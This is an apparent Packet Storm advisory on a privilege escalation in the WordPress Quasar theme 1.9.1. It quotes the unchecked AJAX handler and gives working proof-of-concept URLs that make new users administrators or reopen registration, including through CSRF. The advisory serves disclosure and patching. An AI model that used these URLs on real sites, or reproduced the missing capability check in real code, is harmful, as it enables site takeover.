WordPress Quasar Theme 1.9.1 Privilege Escalation

2015-02-02T00:00:00
ID PACKETSTORM:130200
Type packetstorm
Reporter Evex
Modified 2015-02-02T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------------  
WordPress Quasar Theme Previlege Escalation  
------------------------------------------------------------------------------  
  
  
[-] Theme Link:  
  
http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock  
  
  
[-] Affected Version:  
  
Version 1.9.1  
  
  
[-] Vulnerability Description:  
  
The vulnerable code is located in the /rock-builder/rock-builder-ui.php  
script:  
  
function rock_builder_save_template(){  
  
$data = $_REQUEST['data'];  
$template = $_REQUEST['template'];  
  
$templateName = $template['name'];  
$templateDBName = $template['database_name'];  
update_option($templateDBName, $data);  
  
$builderReferences = get_option("rock_builder_references",array());  
  
$i = 0;  
foreach($builderReferences as $ref){  
if($ref['database_name'] == $templateDBName){  
$builderReferences[$i]['name'] = $templateName;  
update_option("rock_builder_references",$builderReferences);  
//echo "FOUND";  
break;  
}  
$i++;  
}  
  
exit;  
}  
add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template");  
  
then function rock_builder_save_template can be called by logged in users  
and executed which can lead to modifying wordpress settings and adding a  
new administrator which may cause the site a full take over  
  
  
[-] Proof of Concept:  
  
  
Accessing The Url below with a logged in user will set the default role of  
any new registered user as administrator(if you already had a user)  
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template[database_name]=default_role  
  
Accessing The Url below with a logged in user will allow user registration  
if it was disabled  
this can be exploited by sending it to a logged in user or administrater  
(CSRF)  
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template[database_name]=users_can_register  
`